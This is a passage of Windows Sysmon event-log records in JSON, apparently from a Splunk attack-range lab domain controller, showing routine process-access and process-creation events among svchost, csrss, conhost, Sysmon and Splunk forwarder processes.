C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.340","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3173,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.340\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.340","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3174,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.340\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.340","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3175,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.340\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-0010DB210500}\r\nTargetProcessId: 3364\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.340","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-0010DB210500}","TargetProcessId":"3364","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3176,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.355\r\nProcessGuid: {A837DB8D-0239-5F25-0000-0010A4220500}\r\nProcessId: 3548\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-0010DB210500}\r\nParentProcessId: 3364\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  web list settings --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.355","ProcessGuid":"{A837DB8D-0239-5F25-0000-0010A4220500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-0010DB210500}","ParentProcessId":"3364","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  web list settings --no-log","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3177,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.355\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-0010DB210500}\r\nSourceProcessId: 3364\r\nSourceThreadId: 3468\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-0010A4220500}\r\nTargetProcessId: 3548\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.355","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-0010DB210500}","SourceProcessId":"3364","SourceThreadId":"3468","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-0010A4220500}","TargetProcessId":"3548","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3178,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.355\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-0010A4220500}\r\nTargetProcessId: 3548\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.355","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-0010A4220500}","TargetProcessId":"3548","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3179,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.355\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.355","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3180,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.355\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.355","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3181,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.355\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 